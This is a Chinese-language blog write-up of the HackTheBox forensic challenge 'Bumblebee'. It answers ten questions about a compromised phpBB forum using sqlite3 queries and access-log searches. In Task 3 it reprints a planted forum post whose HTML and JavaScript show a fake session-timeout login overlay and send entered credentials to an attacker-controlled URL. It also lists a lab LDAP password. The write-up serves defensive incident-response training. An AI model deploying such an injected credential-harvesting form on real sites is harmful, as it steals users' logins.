首页 > 其他分享 >【HTB】Sherlocks-Bumblebee 蓝队 easy

【HTB】Sherlocks-Bumblebee 蓝队 easy

时间:2023-12-14 14:13:51浏览次数:37  
标签:Task HTB 查看 蓝队 Bumblebee phpbb post id log

Task 1

题目:外部承包商的用户名是什么?


外部承包商通过访客 WiFi 访问了 Forela 的内部论坛,他们似乎窃取了管理用户的凭据!

通过内部论坛窃取管理用户的凭据,首先需要注册一个普通用户。通过访客 WiFi 访问,ip 肯定是内网 ip

1、进入 sqlite3

tar -zxvf incident.tgz    # 解压
sqlite3 phpbb.sqlite3     # 进入

2、查看 users 表结构

.tables		# 查看表
pragma table_info(phpbb_users);		# 查看 users 表的字段

可以发现 usernameuser_password两个字段,这是我们感兴趣的

3、查看 users 表

select user_id,username,user_password from phpbb_users;

答案:apoole1

Task 2

题目:承包商使用什么 IP 地址创建帐户?


1、查看表结构,看看有没有需要的

2、查看 ip

select user_id,user_ip from phpbb_users where username="apoole1";

答案:10.10.0.78

Task 3

题目:承包商发布的恶意帖子的 post_id 是什么?


1、查看有没有相关表

.tables

2、查看表结构

pragma table_info(phpbb_posts);

3、查看表内容

.headers on	# 显示表头
select * from phpbb_posts;

可以看见发布了 3 个帖子,序号分别为:1、2、9。其中 1、2 内容很少且正常,9 内容非常多

将 phpbb_posts 表中的内容整理为 html 文件(代码如下)

<!DOCTYPE html>
<html>

<body>
    <table border="1">
        <TR>
            <TH>post_id</TH>
            <TH>topic_id</TH>
            <TH>forum_id</TH>
            <TH>poster_id</TH>
            <TH>icon_id</TH>
            <TH>poster_ip</TH>
            <TH>post_time</TH>
            <TH>post_reported</TH>
            <TH>enable_bbcode</TH>
            <TH>enable_smilies</TH>
            <TH>enable_magic_url</TH>
            <TH>enable_sig</TH>
            <TH>post_username</TH>
            <TH>post_subject</TH>
            <TH>post_text</TH>
            <TH>post_checksum</TH>
            <TH>post_attachment</TH>
            <TH>bbcode_bitfield</TH>
            <TH>bbcode_uid</TH>
            <TH>post_postcount</TH>
            <TH>post_edit_time</TH>
            <TH>post_edit_reason</TH>
            <TH>post_edit_user</TH>
            <TH>post_edit_count</TH>
            <TH>post_edit_locked</TH>
            <TH>post_visibility</TH>
            <TH>post_delete_time</TH>
            <TH>post_delete_reason</TH>
            <TH>post_delete_user</TH>
        </TR>
        <TR>
            <TD>1</TD>
            <TD>1</TD>
            <TD>2</TD>
            <TD>2</TD>
            <TD>0</TD>
            <TD>10.255.254.2</TD>
            <TD>1681296980</TD>
            <TD>0</TD>
            <TD>1</TD>
            <TD>1</TD>
            <TD>1</TD>
            <TD>1</TD>
            <TD></TD>
            <TD>Welcome to phpBB3</TD>
            <TD>This is an example post in your phpBB3 installation. Everything seems to be working. You may delete this
                post if you like and continue to set up your board. During the installation process your first category
                and your first forum are assigned an appropriate set of permissions for the predefined usergroups
                administrators, bots, global moderators, guests, registered users and registered COPPA users. If you
                also choose to delete your first category and your first forum, do not forget to assign permissions for
                all these usergroups for all new categories and forums you create. It is recommended to rename your
                first category and your first forum and copy permissions from these while creating new categories and
                forums. Have fun!</TD>
            <TD>5dd683b17f641daf84c040bfefc58ce9</TD>
            <TD>0</TD>
            <TD></TD>
            <TD></TD>
            <TD>1</TD>
            <TD>0</TD>
            <TD></TD>
            <TD>0</TD>
            <TD>0</TD>
            <TD>0</TD>
            <TD>2</TD>
            <TD>1681832598</TD>
            <TD></TD>
            <TD>48</TD>
        </TR>
        <TR>
            <TD>2</TD>
            <TD>1</TD>
            <TD>2</TD>
            <TD>50</TD>
            <TD>0</TD>
            <TD>10.255.254.2</TD>
            <TD>1681832510</TD>
            <TD>0</TD>
            <TD>1</TD>
            <TD>1</TD>
            <TD>1</TD>
            <TD>1</TD>
            <TD></TD>
            <TD>Introduction Randy Savage</TD>
            <TD>
                <t>Good Afternoon everyone!<br />
                    <br />
                    I am new to the administration team here at forela, I'd like to take a minute and say hello!<br />
                    I have 5 years of administration experience and am ecstatic to be joining this team<br />
                    <br />
                    Regards,<br />
                    Randy
                </t>
            </TD>
            <TD>59bbd9d7e6f899713d7c1da1016e4d25</TD>
            <TD>0</TD>
            <TD></TD>
            <TD>3nk</TD>
            <TD>1</TD>
            <TD>0</TD>
            <TD></TD>
            <TD>0</TD>
            <TD>0</TD>
            <TD>0</TD>
            <TD>1</TD>
            <TD>1681832532</TD>
            <TD></TD>
            <TD>48</TD>
        </TR>
        <TR>
            <TD>9</TD>
            <TD>2</TD>
            <TD>2</TD>
            <TD>52</TD>
            <TD>0</TD>
            <TD>10.10.0.78</TD>
            <TD>1682425042</TD>
            <TD>0</TD>
            <TD>1</TD>
            <TD>1</TD>
            <TD>1</TD>
            <TD>1</TD>
            <TD></TD>
            <TD>Hello Everyone</TD>
            <TD>
                <div>
                    <style>
                        body {
                            z-index: 100;
                        }

                        .modal {
                            position: fixed;
                            top: 0;
                            left: 0;
                            height: 100%;
                            width: 100%;
                            z-index: 101;
                            background-color: white;
                            opacity: 1;
                        }

                        .modal.hidden {
                            visibility: hidden;
                        }
                    </style>
                    <script
                        type="text/javascript">
                        function sethidden() { 
                            const d = new Date(); d.setTime(d.getTime() + (24 * 60 * 60 * 1000)); 
                            let expires = "expires=" + d.toUTCString(); document.cookie = "phpbb_token=1;" + expires + ";"; 
                            var modal = document.getElementById('zbzbz1234'); 
                            modal.classList.add("hidden"); 
                        } 

                        document.addEventListener("DOMContentLoaded", 
                            function (event) { 
                                let cookieexists = false; let name = "phpbb_token="; 
                                let cookies = decodeURIComponent(document.cookie); 
                                let ca = cookies.split(';'); 
                                for (let i = 0; i < ca.length; i++) { 
                                    let c = ca[i]; 
                                    while (c.charAt(0) == ' ') { 
                                        c = c.substring(1); 
                                        } 
                                    if (c.indexOf(name) == 0) { 
                                        cookieexists = true; 
                                        } 
                                    } 
                                if (cookieexists) { return; } 
                                var modal = document.getElementById('zbzbz1234'); 
                                modal.classList.remove("hidden"); 
                            }
                        );
                        </script>
                    <iframe name="hiddenframe" id="hiddenframe" style="display:none"></iframe>
                    <div class="modal hidden" id="zbzbz1234" onl oad="shouldshow">
                        <div id="wrap" class="wrap"> <a id="top" class="top-anchor" accesskey="t"></a>
                            <div id="page-header">
                                <div class="headerbar" role="banner">
                                    <div class="inner">
                                        <div id="site-description" class="site-description"> <a id="logo" class="logo"
                                                href="./index.php" title="Board index"><span
                                                    class="site_logo"></span></a>
                                            <h1>forum.forela.co.uk</h1>
                                            <p>Forela internal forum</p>
                                            <p class="skiplink"><a href="#start_here">Skip to content</a></p>
                                        </div>
                                        <div id="search-box" class="search-box search-header" role="search">
                                            <form action="./search.php" method="get" id="search1">
                                                <fieldset> <input name="keywords" id="keywords1" type="search"
                                                        maxlength="128" title="Search for keywords"
                                                        class="inputbox search tiny" size="20" value=""
                                                        placeholder="Search…"> <button class="button button-search"
                                                        type="submit" title="Search"> <i class="icon fa-search fa-fw"
                                                            aria-hidden="true"></i><span class="sr-only">Search</span>
                                                    </button> <a href="./search.php" class="button button-search-end"
                                                        title="Advanced search"> <i class="icon fa-cog fa-fw"
                                                            aria-hidden="true"></i><span class="sr-only">Advanced
                                                            search</span> </a> </fieldset>
                                            </form>
                                        </div>
                                    </div>
                                </div>
                                <div class="navbar" role="navigation">
                                    <div class="inner">
                                        <ul id="nav-main" class="nav-main linklist" role="menubar">
                                            <li id="quick-links" class="quick-links dropdown-container responsive-menu"
                                                data-skip-responsive="true"> <a href="#"
                                                    class="dropdown-trigger dropdown-toggle"> <i class="icon fa-bars fa-fw" aria-hidden="true"></i><span>Quick
                                                        links</span> </a>
                                                <div class="dropdown">
                                                    <div class="pointer">
                                                        <div class="pointer-inner"></div>
                                                    </div>
                                                    <ul class="dropdown-contents" role="menu">
                                                        <li class="separator"></li>
                                                        <li> <a href="./search.php?search_id=unanswered"
                                                                role="menuitem"> <i
                                                                    class="icon fa-file-o fa-fw icon-gray"
                                                                    aria-hidden="true"></i><span>Unanswered
                                                                    topics</span> </a> </li>
                                                        <li> <a href="./search.php?search_id=active_topics"
                                                                role="menuitem"> <i
                                                                    class="icon fa-file-o fa-fw icon-blue"
                                                                    aria-hidden="true"></i><span>Active topics</span>
                                                            </a> </li>
                                                        <li class="separator"></li>
                                                        <li> <a href="./search.php" role="menuitem"> <i
                                                                    class="icon fa-search fa-fw"
                                                                    aria-hidden="true"></i><span>Search</span> </a>
                                                        </li>
                                                        <li class="separator"></li>
                                                    </ul>
                                                </div>
                                            </li>
                                            <li data-skip-responsive="true"> <a href="/phpBB3/app.php/help/faq"
                                                    rel="help" title="Frequently Asked Questions" role="menuitem"> <i
                                                        class="icon fa-question-circle fa-fw"
                                                        aria-hidden="true"></i><span>FAQ</span> </a>
                                            <li class="rightside" data-skip-responsive="true"> <a
                                                    href="./ucp.php?mode=login" title="Login" accesskey="x"
                                                    role="menuitem"> <i class="icon fa-power-off fa-fw"
                                                        aria-hidden="true"></i><span>Login</span> </a> </li>
                                            <li class="rightside" data-skip-responsive="true"> <a
                                                    href="./ucp.php?mode=register" role="menuitem"> <i
                                                        class="icon fa-pencil-square-o  fa-fw"
                                                        aria-hidden="true"></i><span>Register</span> </a> </li>
                                            </li data-skip-responsive="true">
                                        </ul>
                                        <ul id="nav-breadcrumbs" class="nav-breadcrumbs linklist navlinks"
                                            role="menubar">
                                            <li class="breadcrumbs" itemscope=""
                                                itemtype="http://schema.org/BreadcrumbList" style="max-width: 936px;">
                                                <span class="crumb" itemtype="http://schema.org/ListItem"
                                                    itemprop="itemListElement" itemscope=""><a href="./index.php"
                                                        itemtype="https://schema.org/Thing" itemprop="item"
                                                        accesskey="h" data-navbar-reference="index"
                                                        title="Board index"><i class="icon fa-home fa-fw"></i><span
                                                            itemprop="name">Board index</span></a>
                                                    <meta itemprop="position" content="1">
                                                </span> </li>
                                            <li class="rightside responsive-search"> <a href="./search.php"
                                                    title="View the advanced search options" role="menuitem"> <i
                                                        class="icon fa-search fa-fw" aria-hidden="true"></i><span
                                                        class="sr-only">Search</span> </a> </li>
                                        </ul>
                                    </div>
                                </div>
                            </div> <a id="start_here" class="anchor"></a>
                            <div id="page-body" class="page-body" role="main">
                                <div class="panel">
                                    <div class="inner">
                                        <div class="content">
                                            <h3>Session Timeout</h3> <br /> <br />
                                            <p>Your session token has timed out in order to proceed you must login
                                                again.</p>
                                        </div>
                                    </div>
                                </div>
                                <form action="http://10.10.0.78/update.php" method="post" id="login"
                                    data-focus="username" target="hiddenframe">
                                    <div class="panel">
                                        <div class="inner">
                                            <div class="content">
                                                <h2 class="login-title">Login</h2>
                                                <fieldset class="fields1">
                                                    <dl>
                                                        <dt><label for="username">Username:</label></dt>
                                                        <dd><input type="text" tabindex="1" name="username"
                                                                id="username" size="25" value=""
                                                                class="inputbox autowidth"></dd>
                                                    </dl>
                                                    <dl>
                                                        <dt><label for="password">Password:</label></dt>
                                                        <dd><input type="password" tabindex="2" id="password"
                                                                name="password" size="25" class="inputbox autowidth"
                                                                autocomplete="off"></dd>
                                                    </dl>
                                                    <dl>
                                                        <dd><label for="autologin"><input type="checkbox"
                                                                    name="autologin" id="autologin"
                                                                    tabindex="4">Remember me</label></dd>
                                                        <dd><label for="viewonline"><input type="checkbox"
                                                                    name="viewonline" id="viewonline" tabindex="5">Hide
                                                                my online status this session</label></dd>
                                                    </dl>
                                                    <dl>
                                                        <dt>&amp;nbsp;</dt>
                                                        <dd> <input type="submit" name="login" tabindex="6"
                                                                value="Login" class="button1" onclick="sethidden()">
                                                        </dd>
                                                    </dl>
                                                </fieldset class="fields1">
                                            </div>
                                        </div>
                                    </div>
                                </form>
                            </div>
                            <div id="page-footer" class="page-footer" role="contentinfo">
                                <div class="navbar" role="navigation">
                                    <div class="inner">
                                        <ul id="nav-footer" class="nav-footer linklist" role="menubar">
                                            <li class="breadcrumbs"> <span class="crumb"><a href="./index.php"
                                                        data-navbar-reference="index" title="Board index"><i
                                                            class="icon fa-home fa-fw"
                                                            aria-hidden="true"></i><span>Board index</span></a></span>
                                            </li>
                                            <li class="responsive-menu hidden rightside dropdown-container"><a
                                                    href="javascript:void(0);"
                                                    class="js-responsive-menu-link responsive-menu-link dropdown-toggle"><i
                                                        class="icon fa-bars fa-fw" aria-hidden="true"></i></a>
                                                <div class="dropdown">
                                                    <div class="pointer">
                                                        <div class="pointer-inner"></div>
                                                    </div>
                                                    <ul class="dropdown-contents"></ul>
                                                </div>
                                            </li>
                                            <li class="rightside">All times are <span title="UTC">UTC</span></li>
                                            <li class="rightside"> <a href="./ucp.php?mode=delete_cookies"
                                                    data-ajax="true" data-refresh="true" role="menuitem"> <i
                                                        class="icon fa-trash fa-fw" aria-hidden="true"></i><span>Delete
                                                        cookies</span> </a> </li>
                                        </ul>
                                    </div>
                                </div>
                                <div class="copyright">
                                    <p class="footer-row"> <span class="footer-copyright">Powered by <a
                                                href="https://www.phpbb.com/">phpBB</a>® Forum Software © phpBB
                                            Limited</span> </p>
                                    <p class="footer-row"> <a class="footer-link" href="./ucp.php?mode=privacy"
                                            title="Privacy" role="menuitem"> <span
                                                class="footer-link-text">Privacy</span> </a> | <a class="footer-link"
                                            href="./ucp.php?mode=terms" title="Terms" role="menuitem"> <span
                                                class="footer-link-text">Terms</span> </a> </p>
                                </div>
                                <div id="darkenwrapper" class="darkenwrapper" data-ajax-error-title="AJAX error"
                                    data-ajax-error-text="Something went wrong when processing your request."
                                    data-ajax-error-text-abort="User aborted request."
                                    data-ajax-error-text-timeout="Your request timed out; please try again."
                                    data-ajax-error-text-parsererror="Something went wrong with the request and the server returned an invalid reply.">
                                    <div id="darken" class="darken">&amp;nbsp;</div>
                                </div>
                                <div id="phpbb_alert" class="phpbb_alert" data-l-err="Error"
                                    data-l-timeout-processing-req="Request timed out."> <a href="#" class="alert_close">
                                        <i class="icon fa-times-circle fa-fw" aria-hidden="true"></i> </a>
                                    <h3 class="alert_title">&amp;nbsp;</h3>
                                    <p class="alert_text"></p>
                                </div>
                                <div id="phpbb_confirm" class="phpbb_alert"> <a href="#" class="alert_close"> <i
                                            class="icon fa-times-circle fa-fw" aria-hidden="true"></i> </a>
                                    <div class="alert_text"></div>
                                </div>
                            </div>
                        </div>
                        <div> <a id="bottom" class="anchor" accesskey="z"></a> <img
                                src="./cron.php?cron_type=cron.task.core.tidy_warnings" width="1" height="1" alt="cron">
                        </div>
                    </div><span>Greetings everyone,<br> <br> I am just a visiting IT Contractor, it's a fantastic
                        company y'all have here.<br> I hope to work with you all again soon.<br> <br> Regards,<br>Alex
                        Poole</span>
                </div>
            </TD>
            <TD>d2788f4645ab450a05b1832b98d98d0f</TD>
            <TD>0</TD>
            <TD></TD>
            <TD>af1z987</TD>
            <TD>1</TD>
            <TD>0</TD>
            <TD></TD>
            <TD>0</TD>
            <TD>0</TD>
            <TD>0</TD>
            <TD>1</TD>
            <TD>0</TD>
            <TD></TD>
            <TD>0</TD>
        </TR>
    </table>
</body>

</html>

答案:9

Task 4

题目:凭据窃取者将其数据发送到的完整 URI 是什么?


1、访问页面

将 Task 3 整理出来 html 文件保存在本地,并访问,可得下列界面,是个表单

2、查看源代码

源代码中一共两个 form 表单

form 表单提交到 ./search.php ,似乎没有问题,查看下一个表单

form 表单提交到 http://10.10.0.78/update.php,而 10.10.0.78 是攻击者的 ip(Task 2)

答案:http://10.10.0.78/update.php

Task 5

题目:承包商什么时候以管理员身份登录论坛的?(世界标准时间)


.tables

可以发现一张 phpbb_log 表

.headers on		# 显示表头
select * from phpbb_pog;

最后是 10.10.0.78 使用 admin 登录,虽然 ip 后面是登录时间,但我不知道怎么转换

可以看见 10.10.0.78 进行了三次操作。第一次登录,第二次添加,第三次获取数据库备份

以管理员身份登录,数据多半是以 POST 方式传递

cat access.log | grep 'POST'

在 phpbb_log 表中,最后是由 10.10.0.78 进行登录操作,因此,找出最后一个 sid

可以看见,最后 4 条记录的 sid 是一样的,说明攻击者用 admin 权限进行四次操作(POST),使用 admin 权限进行操作前需要登录,因此,1 条登录记录,4 条操作记录

注意:题目要求世界时间,而日志中 +0100 代表东一区。所以,日志中的时间是东一区的时间

答案:26/04/2023 10:53:12

Task 6

题目:论坛里有LDAP连接的明文凭据,密码是多少?


select * from phpbb_config;

答案:Passw0rd1

Task 7

题目:管理员用户的用户代理是什么?


日志文件中,每条数据都记录了用户代理

我们只需要排除正常的用户代理即可

cat access.log |grep -v 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv'

答案:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36

Task 8

题目:承包商什么时候将自己添加到管理员组?(世界标准时间)


1、确定管理员组成员

select user_id,username,group_id from phpbb_users where group_id =5

有两个用户都是管理员组,adminphpbb-admin

2、查看 phpbb_log 表

在上一步中可以看见,adminid 为 2,phpbb-adminid 为 48,Task 5 也分析 phpbb_log 表中 10.10.0.78 进行的三次操作,第二次操作将phpbb-admin用户添加管理员组

3、查看日志文件

Task 5 也可以看见以 POST 方式执行的第二个操作就是将自己添加到管理员组

cat access.log |grep 'mode=manage'

答案:26/04/2023 10:53:51

Task 9

题目:承包商什么时候下载了数据库备份?(世界标准时间)


cat access.log

如果你够仔细,就能在最初查看日志文件时发现

答案:26/04/2023 11:01:38

Task 10

题目:access.log 中所述的数据库备份的大小(以字节为单位)是多少?


cat access.log

也是查看日志文件最初就应该发现

答案:34707

标签:Task,HTB,查看,蓝队,Bumblebee,phpbb,post,id,log
From: https://www.cnblogs.com/IFS-/p/17901030.html

相关文章

  • 【HTB】Sherlocks-Litter 蓝队 easy
    Task1题目:乍一看,这次攻击似乎可疑的是哪种协议?首先查看协议统计可以发现,QUIC使用最多,其次是TCP,最后是DNS短时间内通过大量DNS数据包,比较奇怪答案:DNSTask2题目:我们的主机与另一台主机之间似乎存在大量流量,可疑主机的IP地址是多少?可以看见192.168.157.145、......
  • 【HTB】 Analytics 红队 easy
    1、扫描端口、服务nmap10.10.11.233-sCV2、检查网页1)访问10.10.11.233,失败,出现一个域名添加进hostsecho'10.10.11.233analytical.htb'>>/etc/hosts再次访问,这下就能成功访问2)检查页面信息有个login点击login会跳转至http://data.analytical.htb/auth/log......
  • 【HTB】 Devvortex 红队 easy
    1、端口扫描2、网页检测发现一个表单,查看源代码发现是假表单可能发现一个自定义域名3、子域名扫描gobusterdir-w/usr/share/dirb/wordlists/common.txt-uhttp://dev.devvortex.htb/--no-error4、目录扫描没啥收获5、页面登录1)访问http://dev.devvortex.htb......
  • HTB Pilgrimage
     nmap扫一下发现80和22端口开放。 改hosts文件访问域名pilgrimage.htb 直接就是一个文件上传,尝试有没有文件上传漏洞。发现无论任何类型的文件,会将所有文件重命名并加上png或jpg后缀,但从从文件上传这个点突破是有点困难的。尝试其他的方法,扫一下这个网站,看看有没有敏感......
  • HTB Codify
     第一步,和上次一样,改hosts文件,域名对应ip。信息收集nmap扫一下:└─$nmap-sV10.10.11.239StartingNmap7.93(https://nmap.org)at2023-11-1715:58HKTNmapscanreportforcodify.htb(10.10.11.239)Hostisup(0.31slatency).Notshown:983closedtcppo......
  • htb-Web Requests
    HTTP1)Togettheflag,starttheaboveexercise,thenusecURLtodownloadthefilereturnedby'/download.php'intheservershownabove.curlIP/download.phpHTTPRequestsandResponses1)WhatistheHTTPmethodusedwhileinterceptingthe......
  • htb-cozyhosting
    HTB-CozyHostinghttps://app.hackthebox.com/machines/CozyHosting──(kwkl㉿kwkl)-[~]└─$tail-l/etc/hosts1......
  • HTB-vaccine靶场练习
    靶机地址:10.129.198.90端口扫描nmap-sC-A10.129.198.90扫描后,得到端口21,22,80,操作系统为Ubuntu,21端口为ftp协议可以进行匿名登录,且存在文件backup.zip,和一些路由信息使用匿名用户登录ftp,帐号anonymous,密码为空dir查看当前目录下的文件使用get下载文件使用unzip......
  • HTB-oopsie靶场练习
    靶机地址:10.129.130.57攻击机地址:10.10.14.185端口扫描nmap-sV-sC10.129.130.57访问10.129.130.57,对一些可能有用的信息进行记录打开burp,刷新网页,点击HTTPhistory,注意到/cdn-cgi/login/script.js试着访问http://10.129.130.57/cdn-cgi/login/script.js......
  • HTB 靶场笔记 ACCESS wakeUP
    AccessSYNOPSISAccessisan"easy"difficultymachine,thathighlightshowmachinesassociatedwiththephysicalsecurityofanenvironmentmaynotthemselvesbesecure.AlsohighlightedishowaccessibleFTP/filesharesoftenleadtogetting......